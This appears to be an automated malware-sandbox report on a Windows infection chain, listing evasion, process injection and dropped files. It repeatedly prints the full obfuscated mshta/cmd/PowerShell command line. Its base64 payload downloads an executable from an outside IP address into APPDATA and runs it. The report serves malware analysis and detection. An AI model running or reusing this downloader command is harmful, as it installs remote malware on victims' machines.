Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2180 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7784 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 9520 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1407
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 9771
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 3644 Thread sleep time: -420000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776 Thread sleep count: 2180 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776 Thread sleep count: 7784 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3832 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 4016 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2580 Thread sleep count: 1407 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2580 Thread sleep count: 1698 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476 Thread sleep time: -300000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
Source: dllhost.exe, 0000000B.00000003.441229287.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.478564452.0000000003AF7000.00000004.00000020.00020000.00000000.sdmp, differences.11.dr Binary or memory string: cQEmU]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_003CFCB8 LdrInitializeThunk, 14_2_003CFCB8
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP" Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP"
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))" Jump to behavior
